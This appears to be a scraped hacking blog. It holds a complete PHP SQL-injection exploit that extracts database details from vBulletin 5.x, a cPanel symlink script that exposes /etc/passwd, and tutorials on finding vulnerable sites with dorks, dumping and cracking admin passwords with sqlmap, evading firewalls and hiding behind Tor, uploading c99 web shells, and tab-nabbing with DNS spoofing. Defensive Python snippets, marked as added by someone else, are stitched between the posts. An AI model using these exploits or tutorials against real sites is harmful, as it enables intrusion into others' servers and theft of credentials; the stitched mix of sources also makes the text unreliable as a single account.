[+] Wayc0de's Blog[+]


19/09/14

vBulletin 5.x Remote Code Execution Exploit

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
   
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));


    $output = curl_exec($ch);
   
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}


// Get version


print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
   
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabase: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>


CPanel Symlink Bypasser

#!/bin/bash
# ______ __ ____ ___
# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
# /_/ /____/_/
############################################
# CPanel Symlink Bypasser [Public Version] #
# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #
# alm3refh.com © Group XP 2014 #
############################################
#
# USAGE:
# 1. UPLOAD ME IN /home/user as Cpbypass.sh
# 2. GO TO CRON JOB
# 3. ADD THIS COMMAND:
# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com
#
# email@gmail.com = your email
#
#
# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!
# PS: ENJOY!
#
#
##########
# FILE #
##########
SYM="/etc/passwd"
########
echo ""
echo " ______ __ ____ ___"
echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"
echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "
echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "
echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "
echo " /_/ /____/_/ "
echo " CPanel Symlink Bypasser [Public Version]"
echo " By Hannibal Ksa & R3m0t3 Nu11"
echo ""
echo ""
########
rand=bypass$(( $RANDOM % 10 + 100 ));
###
# 1st 3xpl017
###
ln -sf $SYM tmp/analog/$rand.html
echo ""
echo "1st Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 2nd 3xpl017
###
ln -sf $SYM tmp/webalizer/$rand.html
echo ""
echo "2nd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 3rd 3xpl017
###
ln -sf $SYM tmp/webalizerftp/$rand.html
echo ""
echo "3rd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 4th 3xpl017
###
ln -sf $SYM logs/$rand.doc
echo ""
echo "4th Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo ""
echo "THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"
echo ""
# DONE of the public version!
# E0F
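A defensive counterpart, added here and not part of the script above: it walks the stats and log directories of a cPanel account and reports every symlink that resolves outside the account's home, which is exactly the shape the bypass relies on. The throwaway home directory, its file names and the bypass107 suffix are constructed for the demo.

```python
import os
import shutil
import tempfile


def find_escaping_symlinks(home, scan_dirs=("tmp", "logs", "public_html")):
    """Return sorted (relative_link_path, resolved_target) pairs for every
    symlink under the given subdirectories of `home` whose resolved target
    lies outside `home`. realpath() follows chained links, and os.walk is
    told not to descend into symlinked directories."""
    home_real = os.path.realpath(home)
    findings = []
    for sub in scan_dirs:
        root = os.path.join(home, sub)
        if not os.path.isdir(root):
            continue
        for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
            for name in dirnames + filenames:
                path = os.path.join(dirpath, name)
                if not os.path.islink(path):
                    continue
                target = os.path.realpath(path)
                # A target inside the account shares the home as common prefix.
                if os.path.commonpath([home_real, target]) != home_real:
                    findings.append((os.path.relpath(path, home), target))
    return sorted(findings)


def build_demo_home():
    """Constructed fixture (not a real account): one legitimate link that
    stays inside the account and two links of the shape the script creates."""
    home = tempfile.mkdtemp(prefix="cpbypass-audit-")
    for sub in ("tmp/analog", "tmp/webalizer", "logs", "public_html"):
        os.makedirs(os.path.join(home, sub))
    index = os.path.join(home, "public_html", "index.html")
    with open(index, "w") as fh:
        fh.write("hello")
    os.symlink(index, os.path.join(home, "tmp", "analog", "site.html"))
    # Stats directories pointing at a system file outside the account.
    os.symlink("/etc/passwd", os.path.join(home, "tmp", "webalizer", "bypass107.html"))
    os.symlink("/etc/passwd", os.path.join(home, "logs", "bypass107.doc"))
    return home


if __name__ == "__main__":
    demo = build_demo_home()
    try:
        for link, target in find_escaping_symlinks(demo):
            print(f"ESCAPING SYMLINK {link} -> {target}")
    finally:
        shutil.rmtree(demo)
```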

13/03/14

Hackers can steal Whatsapp conversations due to Android security flaw

A SECURITY VULNERABILITY in the Android mobile operating system has been discovered that can allow cyber criminals to steal conversations from users of the mobile messaging service Whatsapp.
Discovered by Bas Bosschert, the CTO of startup company Doublethink, the flaw was detailed in a blog post in which Bosschert demonstrated the method for accessing Whatsapp chats. He confirmed that the vulnerability still exists even after Google updated the Whatsapp app just last week.
The exploit is possible because the Whatsapp database on Android is saved on the SD card, which can be read by any Android application the user has allowed to access the card.
"And since majority of the people [allow] everything on their Android device, this is not much of a problem," Bosschert said, noting that this is an issue in the Android infrastructure, specifically a problem with Android's data sandboxing system, as opposed to a security flaw in Whatsapp.
From there, a malicious app could access the Whatsapp conversation database, Bosschert said, testing his method with a companion app that he built, which uses a loading screen to distract the user while the database files are being uploaded.
Bosschert said that he can even decrypt the database with his own script despite the Whatsapp application's attempts in its recent update to encrypt the database to the point where it can't be opened by SQLite.
"We can simply decrypt this database using a simple python script," Bosschert said. "This script converts the [encrypted] database to a plain SQLite3 database.
"So, we can conclude that every application can read the Whatsapp database and it is also possible to read the chats from the encrypted databases. Facebook didn't need to buy Whatsapp to read your chats."
The full step by step guide for how he hacked Whatsapp can be found in Bosschert's blog post.
Whatsapp added privacy features and the ability to pay for a friend's subscription when it updated its Android app on Monday.
The added privacy includes controls for users to hide when they were last seen, their profile photo and their status updates from prying eyes.
While these are not groundbreaking changes, releasing a privacy update will likely appease its users following Facebook's $19bn acquisition of the company, which has sparked privacy fears among Whatsapp users. These concerns are ongoing, as privacy groups called for the FTC to investigate the buyout last week, saying that it represents a threat to privacy.

10/03/14

Playing with SQL Injection and Firewall Bypassing


Disclaimer: This article is for educational purposes only, for security researchers and pentesters. I would like to clarify that I am completely against cyber-crime.

ABSTRACT
Most cyber-attacks on websites succeed because of missing updates and configuration faults.
One of the main threats is SQL Injection, which has left many worried about their systems, their programmers, and their SQL databases.
The biggest problem is not the DBMS itself but the lack of definition and validation of the input fields in web applications.

CONTEXT
Many web developers do not know how SQL queries can be tampered with and assume that an SQL query is a trusted command. This allows SQL queries to circumvent access controls, bypassing standard authentication and authorization checks. Sometimes SQL queries may even give access to a command shell at the server operating system level.
Direct injection of SQL commands is a technique where an attacker creates or alters existing SQL commands to expose hidden data, override valuable data, or even execute dangerous system-level commands on the server.

INTRODUCTION
Structured Query Language is the standard declarative language for relational databases, valued for its simplicity and ease of use.
SQL was originally developed in the early 70s at IBM labs.
SQLMAP is a tool for this type of vulnerability.
It is open source, written in Python, and often used in penetration testing against fragile DBMSs. It provides functions to detect and exploit SQL injection vulnerabilities. Let's use sqlmap.py as the example, since it is widely used across operating systems and databases.

STEP BY STEP
Readers, I will try to explain this in the simplest possible way.

You must have a vulnerable target. To find out whether a target is vulnerable, just add ' at the end of the URL being tested and press "Enter"; if an error is returned, the database is vulnerable.
You can use Google to find one with a dork. Example: inurl: news.php id = 1?
There is a database of Google dorks and several other options that can be used to filter your search.

cd /pentest/database/sqlmap

Now we begin the game. To view the help menu for sqlmap.py, use the command ./sqlmap.py -h

Run sqlmap.py with the parameter --dbs to enumerate all databases in the DBMS.


Or use the parameter --current-db to show the database currently in use.

The parameter -D selects the target database and --tables lists its tables.


We will check for interesting information in the table admin_users, so it is time to list the columns. The parameter is --columns.

It is important to always indicate the target database (-D) before listing tables, because without -D it will list all tables in all databases.
-T = target table
-C = target columns; more than one column can be chosen. Example: username, password.
--dump = retrieve, extract data.
Also remember the parameter --proxy, which enables the use of a proxy.

Example:  ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --proxy=http://183.223.10.108:80

Readers, I think that's the basics for beginners. sqlmap.py also has many other interesting functions; I suggest researching --prefix=PREFIX, --postfix=POSTFIX and the takeover options.
More information about the program, and videos of it in action, can be found on the official site.

--dump extracts the data from the site, but it is not given any target on its own: it must be applied within the selected column, and you have to choose what to extract from that column. Here I extracted the logins and passwords saved in the column.

Generally, the password fields in a DBMS are encrypted.
We then need to decrypt the passwords in order to access the target system.
We can find a way to log into the system. But wait, the passwords are MD5 hashes, hahahaha; put your hash on http://www.md5decrypt.org and it may be decrypted, or otherwise


BEYOND THE BASICS
Readers, lucky for us, there are some awesome tamper scripts for sqlmap, which can be found in the latest development version from the Subversion repository.

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

The function of the tamper scripts is to modify the request in a way that escapes the detection rules of a WAF (Web Application Firewall). In some cases it may be necessary to combine several tamper scripts to fool the WAF. For a complete list of tamper scripts, see https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/

Many enterprises overlook their current vulnerabilities and rely only on the firewall for protection. Unfortunately, most if not all firewalls can be bypassed. So, gentlemen, I want to demonstrate how to use some of the new features of sqlmap to bypass WAFs/IDS.

Well, I'll demonstrate two important scripts, charencode.py and charunicodeencode.py, for working with MySQL.

Hands-on: To begin using tamper scripts, use --tamper followed by the script name. In the example, we use the command:

Summary of charencode.py
Quite simply, this script is useful for bypassing very weak web application firewalls (WAFs), namely those that do not url-decode the request before processing it through their rule set.
The web server url-decodes the request anyway, so it should work against any DBMS.

Example of use:
We will demonstrate the use of charunicodeencode.py as a further option. A vast number of organizations have deployed a WAF. Guys, this is the tricky part of exploiting such an environment: standard SQL injection attack vectors will not work, and neither will the scripts.
That is why we use tamper scripts; this facility, known as "tamper scripts", is a quiet way to bypass web application firewalls.

Guys, I have demonstrated just a few of the many tamper scripts. I highly recommend testing them out, as each one can be used in different situations.

Notes: This is not a tool for "script kiddies"; it is of utmost importance to use such a powerful tool responsibly and maturely.
Caution: if used in the wrong way, sqlmap generates many queries and can affect the performance of the target database; moreover, strange entries and changes to the database schema are possible if the tool is used extensively without control.
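Added example (not from the vBulletin post above or from the sqlmap project) that ties the boolean-based payload of the vBulletin exploit to this section: a request-inspection rule only catches that payload if it first undoes the encodings charencode.py and charunicodeencode.py apply, so the normaliser below decodes %XX, %uXXXX and '+' repeatedly before matching. The request bodies and the small signature list are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, quote, unquote

# Small signature set applied AFTER decoding; the decoding is the point here.
SQLI_PATTERNS = [
    (r"""['"]\s*(or|and)\s""", "quote followed by boolean operator"),
    (r"""--\s*['"]?\s*$""", "SQL line comment truncating the query"),
    (r"\b(version|user|database)\s*\(\s*\)", "DBMS metadata function call"),
    (r"\bsubstr(ing)?\s*\(", "character extraction (blind probe shape)"),
]

_UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")


def normalize(value, max_rounds=3):
    """Undo the encodings charencode.py / charunicodeencode.py apply: %XX,
    %uXXXX and '+' as space, repeated until the value stops changing. The
    round limit keeps a crafted input from making the inspector loop."""
    current = value
    for _ in range(max_rounds):
        decoded = _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), current)
        decoded = unquote(decoded.replace("+", " "))
        if decoded == current:
            break
        current = decoded
    return current


def inspect_body(body):
    """Return [(parameter, reason), ...] for one form-encoded request body.
    parse_qsl already decodes one layer; normalize() strips any further ones."""
    findings = []
    for name, raw in parse_qsl(body, keep_blank_values=True):
        value = normalize(raw).lower()
        for pattern, reason in SQLI_PATTERNS:
            if re.search(pattern, value):
                findings.append((name, reason))
    return findings


# Constructed sample bodies (not captured traffic). PROBE has the shape of the
# payload in the vBulletin post; the variants wrap it the way the two tamper
# scripts would, so the rule is exercised against each encoding.
PROBE = '" OR SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)-- "'
SAMPLE_BODIES = {
    "benign": "criteria[perpage]=10&criteria[startswith]=a&securitytoken=guest",
    "plain": 'criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+&securitytoken=guest',
    "percent_encoded": "criteria[startswith]=" + quote(PROBE, safe=""),
    "double_encoded": "criteria[startswith]=" + quote(quote(PROBE, safe=""), safe=""),
    "unicode_encoded": "criteria[startswith]=" + "".join("%%u%04X" % ord(c) for c in PROBE),
}


def flagged_samples():
    """Map each sample name to the sorted list of reasons its body triggered."""
    return {name: sorted({r for _, r in inspect_body(body)})
            for name, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for name, reasons in flagged_samples().items():
        print(f"{name:16s} {'FLAG' if reasons else 'ok  '} {reasons}")
```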

PARTLY ANONYMOUS
I will demonstrate how to use sqlmap with The Onion Router to protect your IP, DNS, etc. On your Linux system, in the terminal type:
$ sudo apt-get install tor tor-geoip

Then enter the sqlmap folder and type:
./sqlmap.py -u "http://www.targetvuln.com/index.php?cata_id=1" -b -a --tor --check-tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

The argument --tor tells sqlmap to use Tor, and --check-tor checks whether Tor is being used properly; if not, you will receive an error message in red in the terminal. The user agent is Googlebot, so all your requests to the site will look like the Google bot paying a little visit.

With Tor in sqlmap, we can set a Tor proxy to hide the source from which the traffic or request is generated.

--tor-port, --tor-type : these parameters let you set the Tor proxy manually.
--check-tor : this parameter checks whether the Tor setup is appropriate and functional.

CONCLUSION:
It is well known that many targets were exploited through SQL Injection a few years ago, when this threat was discovered; back then manual injection was "the nail". The pentester had to enter the code by hand, taking longer to complete the attack.
Then came programs that automated the attack. Nowadays perhaps the best known of these programs is sqlmap.py. SQLMAP is an open source testing framework written in Python. It has full support for the database systems MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB, and supports 6 types of SQL Injection techniques.

SOLUTION:
1. Patch the SQL server regularly.
2. Limit the use of dynamic queries.
3. Escape input data from users.
4. Store the database credentials in a separate file.
5. Use the principle of least privilege.
6. Turn off magic quotes.
7. Disable shell access.
8. Disable any database features that you do not need.
9. Test your code.
10. Search Google for advanced techniques to correct this vulnerability.
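Items 2 and 3 of that list as working code, added here and not taken from the article: the same "members starting with" lookup built by string concatenation and then with a bound parameter, probed with the single-quote test from STEP BY STEP and with a boolean payload. The users table and its rows are constructed for the demo, and it uses Python's sqlite3 module rather than the MySQL the article targets.

```python
import sqlite3

# Constructed sample rows (not from the article): a few forum members.
SAMPLE_USERS = ["admin", "alice", "bob_99", "carol%"]


def make_db():
    """In-memory SQLite database seeded with the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?)", [(u,) for u in SAMPLE_USERS])
    return conn


def members_starting_with_vulnerable(conn, prefix):
    """Dynamic query built by concatenation: the user's input becomes SQL.
    This is the pattern solution items 2 and 3 warn against."""
    sql = "SELECT username FROM users WHERE username LIKE '" + prefix + "%' ORDER BY username"
    return [row[0] for row in conn.execute(sql)]


def escape_like(value):
    """Escape LIKE wildcards so a literal '%' or '_' in the input is matched
    literally instead of acting as a wildcard (pairs with ESCAPE '\\' below)."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def members_starting_with_safe(conn, prefix):
    """Parameterised query: the driver binds the value, so quotes, comment
    markers and SQL keywords in the input are data, never code."""
    sql = "SELECT username FROM users WHERE username LIKE ? ESCAPE '\\' ORDER BY username"
    return [row[0] for row in conn.execute(sql, (escape_like(prefix) + "%",))]


def probe(prefix):
    """Run both variants on one input and report what each returns; the
    vulnerable one reports 'error' when the input breaks the SQL syntax."""
    conn = make_db()
    try:
        vulnerable = members_starting_with_vulnerable(conn, prefix)
    except sqlite3.OperationalError:
        vulnerable = "error"
    safe = members_starting_with_safe(conn, prefix)
    conn.close()
    return {"vulnerable": vulnerable, "safe": safe}


if __name__ == "__main__":
    # "'" is the article's quick test; the boolean payload dumps every row
    # from the concatenated query and matches nothing in the bound one.
    for test in ["a", "'", "' OR 1=1 --", "%", "carol%"]:
        print(repr(test), probe(test))
```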



26/09/12

Fimap Tool - Local And Remote File Inclusion With Backbox Linux

 

Description: LFI attack with fimap; target: DVWA; platform: BackBox Linux.

First you need to install DVWA*, then run the Apache server (it comes with BackBox Linux), then read how to use fimap (in a terminal: fimap -h) and get a c99 shell script (to find one, type inurl:c99.txt in the Google search box). You will need to set the Apache directory permissions; for this you can use this bash script: http://www.linux.re.rs/files/scripts/dirbash.sh. I will show you how to upload a shell to the vulnerable server and exploit the vulnerability.

* How to install DVWA with BackBox Linux !

http://www.anonimus.re.rs/6562

Author : Nenad Marjanovic
IT nick : ZEROF
Author site : http://www.pentester.iz.rs 

25/09/12

Urlcrazy Tool On Backtrack 5 R3



Description: URLCrazy is a tool that can generate and test domain typos and variations to detect and perform typosquatting, URL hijacking, phishing, and corporate espionage. It generates 15 types of domain variants, knows over 8000 common misspellings, supports multiple keyboard layouts, can check whether a typo is a valid domain, tests whether domain typos are in use, and estimates the popularity of a typo.


Vega Web Scanner On Backtrack 5 R3

  
Description: Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. 



23/09/12

Tab-Nabbing With Dns Spoofing Using Backtrack

 

Description: In this tutorial I explain how to use SET (Social Engineering Toolkit) for tab nabbing, and DNS spoofing with Ettercap to make it more effective on a LAN.

In the next tutorial I will explain how to do it using port 443 on the attacker machine instead of port 80, so that even if the victim types https://url instead of http, he/she still gets attacked.


Proxy Checker

Assalamu'alaikum Wr Wb

As the title says, I'm sure you all know how this story ends

CHECK IT OUT!!!

1. First download the proxy checker tool: Proxy Checker

2. Have a list of proxies you want to check; if you're too lazy to collect them,
here I've already provided a few proxy lists that I got from all sorts of trusted sources

Download them here, guys: List Proxy

3. Once the two things above are ready, next we try running the checker tool
when the text "Enter Your Proxy Lists" appears, just enter the name of your proxy list folder
and the rest can be filled in as in the image below



4. After that we just wait for the results, guys



5. Once the checker has finished, it's time to test the results of the proxy check one by one. The results are automatically saved as a .txt file named works.txt

that's all for this sharing session for now
hopefully it's useful for all of us

finally, Wassalamu'alaikum Wr Wb

20/11/11

Tutorial Wordpress Scanning

Assalamu'alaikum and greetings to us all
here I am again, the newbie
this time I'll give a little tutorial about scanning WordPress and

without much chatter, straight to the main topic

CHECK IT OUT!!!

1. Download the WordPress scanner software here: wp-scan

==============================================================

-=- we will run the WordPress scanner

after downloading, extract the file first

open a terminal and type the following commands:



cd Downloads
cd WP-SCAN
perl wp-scan.pl target.com
ex : perl wp-scan.pl www.webhostingiix.com

after the scan finishes, you can view the results (the process itself isn't shown there)
there will be a report once it has finished; the results can be seen in sqli-bugs.txt in the wp-scan folder

next you can perform injection against the target
===========================================================================

please wait until the scanning process finishes

it will show which ones are vuln

after everything is done, we just look for the exploit, folks

to find the exploit you can search anywhere

that's all for this lame tutorial from me

hopefully it's useful for all of us

finally, wassalam

nb : vba & ArRay

Tutorial Joomla Web Scanner 1.7

Assalamu'alaikum and greetings to us all

it's been a while since the blog was updated

ok, straight to it: this time I'll give a little toy to all you friends

as the title says, "Joomla Web Scanner 1.7"

just from the title, I'm sure you all already understand what this tool is for

CHECK IT OUT!!!

1. first download the tool: Joomla-Scan

2. after downloading, let's extract the file

3. then we'll run the scanning process against the target

first let's look at the commands for this tool

type = ./joomlascan.pl -help

it will output something like this


Usage:  ./joomlascan.pl -u <joomla_url> [options]

    == Options ==
      -p <string:int>  = proxy:port
      -a               = Admin folder (default '/administration')
      -v               = Check version
      -c               = Check components
      -f               = Check firewall
      -co              = Check bugs in core (require -v)
      -cm              = Check bugs in components (require -c)
      -all             = Check all (default)
      -ot              = Output to text file
      -oh              = Output to html file
      -update          = Search for updates
      -force-update    = Force to download updates
      -about           = About joomlascan
      -version         = Print version info
      -h, -help        = This help

    == Examples ==
      To scan running joomla version and components:
         $./joomlascan.pl -u www.host.com -v -c

      To scan version and core bugs:
         $./joomlascan.pl -u www.host.com -v -co

4. time for action by typing the following command

./joomlascan.pl -u www.target.com -v -co

wait until the scanning process finishes, have a smoke first, bro

when it's finished the result will look like this

that's about all for this lame tutorial from me

hopefully it's useful for all of us

finally, wassalam